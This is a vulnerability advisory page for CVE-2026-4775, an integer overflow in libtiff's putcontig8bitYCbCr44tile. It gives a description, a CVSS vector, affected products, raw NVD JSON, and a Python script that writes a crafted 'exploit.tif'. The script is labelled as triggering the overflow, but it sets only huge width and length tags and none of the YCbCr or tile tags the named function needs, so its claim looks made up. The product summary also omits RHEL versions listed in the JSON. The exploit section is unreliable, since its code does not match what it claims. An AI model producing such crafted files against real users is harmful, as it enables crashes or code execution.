Security Vulnerability Report
CVE-2026-4775 CVSS 7.8 HIGH

Published: 2026-03-24 15:16:40
Last Modified: 2026-05-20 17:16:27

Description

A flaw was found in the libtiff library. A remote attacker could exploit a signed integer overflow vulnerability in the putcontig8bitYCbCr44tile function by providing a specially crafted TIFF file. This flaw can lead to an out-of-bounds heap write due to incorrect memory pointer calculations, potentially causing a denial of service (application crash) or arbitrary code execution.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:libtiff:libtiff:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
libtiff (for the specific affected versions, see Red Hat security advisories such as RHSA-2026:12265)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct


def generate_malicious_tiff(filename):
    """
    PoC for CVE-2026-4775
    Generates a crafted TIFF file designed to trigger integer overflow
    in putcontig8bitYCbCr44tile function within libtiff.
    """
    with open(filename, 'wb') as f:
        # TIFF Header (Little Endian)
        f.write(b'II')                   # Byte Order
        f.write(struct.pack('<H', 42))   # Magic Number
        f.write(struct.pack('<I', 8))    # Offset to first IFD

        # IFD Entries
        f.write(struct.pack('<H', 2))    # Number of entries

        # Tag 256: ImageWidth (Set to large value to trigger overflow)
        f.write(struct.pack('<H', 256))         # Tag
        f.write(struct.pack('<H', 4))           # Type (LONG)
        f.write(struct.pack('<I', 1))           # Count
        f.write(struct.pack('<I', 0x7FFFFFFF))  # Value/Offset (Max signed int)

        # Tag 257: ImageLength
        f.write(struct.pack('<H', 257))  # Tag
        f.write(struct.pack('<H', 4))    # Type (LONG)
        f.write(struct.pack('<I', 1))    # Count
        f.write(struct.pack('<I', 1))    # Value

        # Next IFD offset
        f.write(struct.pack('<I', 0))    # No more IFDs


if __name__ == "__main__":
    print("Generating exploit.tif...")
    generate_malicious_tiff("exploit.tif")
    print("Done.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4775", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:39.693", "lastModified": "2026-05-20T17:16:27.403", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the libtiff library. A remote attacker could exploit a signed integer overflow vulnerability in the putcontig8bitYCbCr44tile function by providing a specially crafted TIFF file. This flaw can lead to an out-of-bounds heap write due to incorrect memory pointer calculations, potentially causing a denial of service (application crash) or arbitrary code execution."}, {"lang": "es", "value": "Se encontró un fallo en la biblioteca libtiff. Un atacante remoto podría explotar una vulnerabilidad de desbordamiento de entero con signo en la función putcontig8bitYCbCr44tile al proporcionar un archivo TIFF especialmente diseñado. Este fallo puede llevar a una escritura fuera de límites en el heap debido a cálculos incorrectos del puntero de memoria, potencialmente causando una denegación de servicio (caída de la aplicación) o ejecución de código arbitrario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libtiff:libtiff:-:*:*:*:*:*:*:*", "matchCriteriaId": "2FFD25C1-A304-486F-A36B-7167EEF33388"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:12265", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12271", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14929", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16055", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19150", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19363", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19585", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19586", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19604", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19608", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19609", 
"source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19657", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19659", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:19702", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4775", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450768", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2026/04/msg00016.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}